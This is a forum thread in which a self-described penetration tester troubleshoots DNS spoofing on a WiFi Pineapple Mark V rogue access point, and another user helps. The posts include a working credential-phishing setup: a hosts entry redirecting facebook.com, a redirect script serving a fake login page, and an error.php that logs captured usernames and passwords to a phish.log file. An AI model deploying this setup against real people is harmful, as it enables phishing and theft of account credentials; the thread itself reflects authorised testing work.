Scout32 Posted March 23, 2014 Share Posted March 23, 2014 Hey guys, I just received my new Mark V a few days ago (upgraded from the Mark IV) and I was wondering if anyone else was having issues with DNSSpoof working? The 2GB sd card that shipped with the MK V was corrupt, so I had to download the latest (at the time it was 1.1.0) firmware to my own 8GB sd card. After that it flashed without a hitch. When I SSHed into the pineapple I noticed there was no redirect.php or error.php in /www/, or anywhere else on the MK V for that matter. So I checked the index.html and compared it to the one from the MK IV and they're completely different. Is the MK V handling dnsspoof differently now than the MK IV? I'm going to use my old redirect.php and error.php and try it out, but I was just curious if anyone else had this "issue", or if anyone knows if the MK V is handling dnsspoof differently now. MK V Index.html that came on my pineapple is: <HTML> <BODY> <SCRIPT> if ( window.top==window.self ) { document.write('<iframe src=http://www.google.com style="display:none;"></iframe>'); document.write('<iframe src=http://www.facebook.com style="display:none;"></iframe>'); document.write('<iframe src=http://www.twitter.com style="display:none;"></iframe>'); document.write('<iframe src=http://www.hotmail.com style="display:none;"></iframe>'); document.write('<iframe src=http://www.gmail.com style="display:none;"></iframe>'); document.write('<iframe src=http://www.yahoo.com style="display:none;"></iframe>'); document.write('<iframe src=http://www.paypal.com style="display:none;"></iframe>'); document.write('<iframe src=http://www.live.com style="display:none;"></iframe>'); document.write('<iframe src=http://www.linkedin.com style="display:none;"></iframe>'); } </SCRIPT> </BODY> </HTML> The MK IV Index.html was simply: <html> <head> <meta http-equiv="REFRESH" content="0;url=redirect.php"> </head> <body> </body> </html> Very different. The only other file in /www/ is ncsi.txt and a directory /library/ (within that directory is /test/success.html which is just a simple one liner like the MK IV index.html, just without "REFRESH"). Thanks in advance for any responses/dialog. -Scout. Quote Link to comment Share on other sites More sharing options...
Scout32 Posted March 23, 2014 Author Share Posted March 23, 2014 UPDATE: The old MK IV index.html, redirect.php, and error.php do not work - and neither does dnsspoof. Not sure if it's a bug or what, but this feature isn't really working like it has in the past on the MK IV. I'm testing this on my home network. Firmware version is 1.1.0. I'm also using the MK V in client mode on wlan1 connected to my home ap, and wlan0 is up for clients to connect to my MK V. I turn dnsspoof on via the "configuration" tile, and it's also available to enable on the dnsspoof tile. I also confirmed I have an internet connection. My host file is: 172.16.42.1 *facebook.com My Index.php file is: <html> <head> <meta http-equiv="REFRESH" content="0;url=redirect.php"> </head> <body> </body> </html> My redirect.php is: <?php $ref = $_SERVER['HTTP_REFERER']; if (strpos($ref, "facebook")) { header('Location: facebook.html'); } ?> I have "facebook.html" in /sd/www/facebook.html and a symlink in /www/ pointing to that file (that's how I had my MK IV). My error.php is: <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) { $nam = stripslashes($_POST['name']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas; $filed = @fopen("/sd/logs/phish.log", "a+"); @fwrite($filed, "$content\n"); @fclose($filed); } ?> <html><body> <h1>503 Service Unavailable</h1> </body></html> My dnsspoof log shows activity: dnsspoof: listening on br-lan [udp dst port 53 and not src 172.16.42.1] 172.16.42.159.9964 > 172.16.42.1.53: 27677+ A? facebook.com 172.16.42.159.37718 > 172.16.42.1.53: 55323+ A? www.facebook.com 172.16.42.159.12724 > 208.67.222.222.53: 34488+ A? facebook.com 172.16.42.159.12164 > 208.67.222.222.53: 44409+ A? www.facebook.com 172.16.42.159.12164 > 172.16.42.1.53: 44409+ A? www.facebook.com 172.16.42.159.12164 > 208.67.222.222.53: 44409+ A? www.facebook.com I wonder if openDNS is the problem? I'm not sure if this is an error with dnsspoof, openDNS, or an error on my part (although this is how I had my MK IV setup and it worked flawlessly). I'd like to get this issue figured out as I have a pentest coming up mid April that has on-site social engineering in scope. I'd like to employ this MK V in some fashion during that engagement. I could also use the MK IV, but it was a HUGE p.i.t.a. since I was never able to get usb support for a powered hub (bought the HakShop one, plus 5 other powered hubs and they never worked as they should, so I couldn't get a second radio up AND have my usb with infusions installed at the same time). Thanks in advance, -Scout Quote Link to comment Share on other sites More sharing options...
thesugarat Posted March 23, 2014 Share Posted March 23, 2014 Scout, As for the Mark 4 I'm not entirely sure what you were trying to do but, I used a non powered USB hub and had both USB drive and a second Alfa working... As for the dnsspoofing on the Mark 5 it does work and you are correct it is different. Have you installed the dnsspoof infusion? Have you installed the RandomRoll infusion? Have a look under the hood at the files that make RandomRoll tick and you'll see what it's doing and where. Also, you could just turn in on and then have a look at the index, redirect and error.php files it creates. ssh in and look at the edited versions and that will give you an idea of how it's all interconnected. Just suggestions really. Quote Link to comment Share on other sites More sharing options...
Scout32 Posted March 23, 2014 Author Share Posted March 23, 2014 Thanks for the reply thesugarat. Yeah, I tired powered & non-powered hubs with my MK IV and I wasn't able to get them to work. Or, I should say, I wasn't able to get everything to work at once using a hub. If I used a USB hub, It would recognize the Alpha for only a short time but not the SD card housing my infusions. To me, that was a power issue, however, I tested the MK IV setup with both DC and battery and had the same results. I was mainly trying to use the alpha as a second radio to connect to an AP - which is mainly why I got the MK V. When I first turned dnsspoof on, there was no redirect or error php pages - and for me they didn't get created by enabling dnsspoof. I could only directly access via the web index.php by browsing to 172.16.42.1:8080/index.php. Thanks for the tip on the RandomRoll infusion, I'll install it and take a look at how that one works. I didn't install it because it was one I didn't think I'd use. I'll definitely take a look at it. Thanks again! Scout. Quote Link to comment Share on other sites More sharing options...
Scout32 Posted March 23, 2014 Author Share Posted March 23, 2014 (edited) Ok... so that failed. I installed the RandomRoll module, started dnsspoof, went to browse to www.google.com and the same thing happened; "This web page is not available" (Chrome). I think this is an issue with dnsspoof itself. Also, RandomRoll deleted my original index.html, redirect.php, and error.php (which I expected) - replacing them with JUST index.php in my /www/ directory. No redirect.php, no error.php, anywhere. The redirect.php tab in dnsspoof is now also blank. Pinging google.com as a 'target' with dnsspoof/randomrool enabled shows the pineapple (obviously). SSHing into the pineapple and pinging google.com shows the correct dns resolution for google. There is a clear disconnect with requests while dnsspoof is running. Also, this redirect.php and error.php is interesting and they clearly aren't being created for me. -Scout EDIT: I also noticed the newly created index.php file has a broken html tag in it? It just has a closing </html> tag randomly put at the end of the php... thought that was odd. Further exploring the files with the infusion, I did find "redirect.orig" and "error.orig". Not sure why they never changed to .php, but I'll give that a shot and see how it goes. Edited March 23, 2014 by Scout32 Quote Link to comment Share on other sites More sharing options...
thesugarat Posted March 23, 2014 Share Posted March 23, 2014 Well if you started dnsspoof manually and then went to the RandomRoll infusion and started it up that's incorrect.... The RandomRoll infusion sets everything up for you including turning on dnsspoof. But you have to select and apply the Rolls you want to see then hit start. Once you've done that, try to access any website that is not https and you should get Rolled. If that is working you can then ssh in and poke around at the files. Try the RandomRoll folder, I seem to remember it sets up symlinks to files in it's directory. Quote Link to comment Share on other sites More sharing options...
Scout32 Posted March 23, 2014 Author Share Posted March 23, 2014 Ok, thanks for the suggestion. Am I correct in assuming there should have been a default redirect.php and error.php in /www/ that shipped with the Pineapple? I'm also not sure why the default index.php page has the php extension, as there is no php in it, just HTML and JS which loads a ton of hidden iframes. So here's what's going on from start to finish. My network info tab shows my route as: Destination Gateway <...snip...> Iface default 192.168.2.1 wlan1 172.16.42.0 * br-lan 192.168.2.0 * wlan1 I have internet connection through wlan1 and am accepting hosts on wlan0. Dnsspoof shows disabled in the Configuration tile and the dnsspoof tile. I then go to the RandomRoll tile, select my "rolls", click the "Apply Selected Rolls" button, confirm the popup, then click the "Start RandomRoll" button. The tile reports randomroll has been started. I attempt to brows to www.google.com and I get "This webpage is not available". I go back to the pineapple WUI and check the RandomRoll Log Output, which shows: dnsspoof: listening on br-lan [udp dst port 53 and not src 172.16.42.1] 172.16.42.159.8396 > 172.16.42.1.53: 33684+ A? www.google.com 172.16.42.159.8396 > 208.67.222.222.53: 33684+ A? www.google.com 172.16.42.159.11371 > <...snip...rinse and repeat...snip...> 208.67.222.222 is OpenDNS. Why is this request going out to OpenDNS and not being handled by the pineapple? SSHing into the pineapple, I see a newly created symlink to index.php, and now (didn't show before because I guess I was envoking dnsspoof incorrectly) rickroll.php and rcmroll.php (the two 'rolls' i picked). Now my question is, why the eff aren't these being called? Here's the Index.php created by RandomRoll <?php //Cache Control header("Cache-Control: no-cache, must-revalidate"); eader("Expires: Sat, 26 Jul 1997 05:00:00"); ?> <?php //Thanks newbi3 for fixing my shitty php ;) $loop = 0; foreach(glob("/www/*.php") as $roll){ $rolls[$loop] = $roll; //[debug] echo " $roll "; $loop++; } $element = rand(0, count($rolls)-1); require($rolls[$element]); ?> Reading the code, it should call one of the two rolls - but it doesn't. I'm also looking at the code for the rolls and there's nothing that stands out to me as an issue. Does any of this look familiar? Did your pineapple (or anyone else) come with error.php and redirect.php already in /www/? The MK IV did, which is why I'm confused as to why this one didn't. I'm also confused why index.php has no php code and just loads iframes for a bunch of sites like google, facebook, and twitter. Do you, or anyone else that could chime in, have an example of index.php, redirect.php, and error.php that is working for you? I'm not sure what the deal is really. I'm assuming this functionality should work out of the box and not require this much jacking around with. The MK IV worked for me with no issues. I"m almost wondering if an install was corrupt or dnsspoof didn't install correctly. Frustrating when you just want it to work. I don't mind tinkering with things, but functionality that should just work, I'm not too happy messing around with. Anyway, I'm going to mess with this till it works and I might just uninstall and reinstall to see if that helps. Thanks for the advise, I appreciate all the help. -Scout Quote Link to comment Share on other sites More sharing options...
thesugarat Posted March 23, 2014 Share Posted March 23, 2014 I've got all three in the www by default... I would definitely suggest you reflash the firmware. Reading the index.php that RandomRoll creates... "foreach(glob("/www/*.php") as $roll){" I'm pretty sure that section right there is where it calls out the Rolls... When you select the rolls and turn them on I believe a symlink is created for them in the /www/ folder and the *.php portion catches all of them that were created and the rest of it randomizes it... You only need to change the redirect.php if you plan on phising only specific sites. So I can't help you with that one. I either use Random Roll or the Pineapple Surprise and with both of them you just change the hosts to 172.16.42.1 * to send all sites to the internal server. I'm pretty sure the OpenDNS is one of the default dns servers that is there under the hood. It has been mentioned in other posts. Quote Link to comment Share on other sites More sharing options...
Scout32 Posted March 24, 2014 Author Share Posted March 24, 2014 Cool thanks. Yeah I ended up just scrapping everything and flashing Firmware 1.1.1. I definitely think something went haywire during the flashing process of 1.1.0, or maybe dnsspoof installation. Either way, the reflash to 1.1.1 did the trick and everything is working. I immediately saw index.php, redirect.php, and error.php all in /www/ so something clearly happened in the previous firmware flash for me. That php code snippit should (and I'm sure would now) call the selected random rolls. I probably won't be installing RandomRoll, even though it looks like a pretty fun module, because my testing will be more focused on user awareness than Nyan Cat... although that would be pretty hilarious with some of my clients ;). Thanks again for the assistance. I'm attributing the issue to a bad flash. -Scout Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.